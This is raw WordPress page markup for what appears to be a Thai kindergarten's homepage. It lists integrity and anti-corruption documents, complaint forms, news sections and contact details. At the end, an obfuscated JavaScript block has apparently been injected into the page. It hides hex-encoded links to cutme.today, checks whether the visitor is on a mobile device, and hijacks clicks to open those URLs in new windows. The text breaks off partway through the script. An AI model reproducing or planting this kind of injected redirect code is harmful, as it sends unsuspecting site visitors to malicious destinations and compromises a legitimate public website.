data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 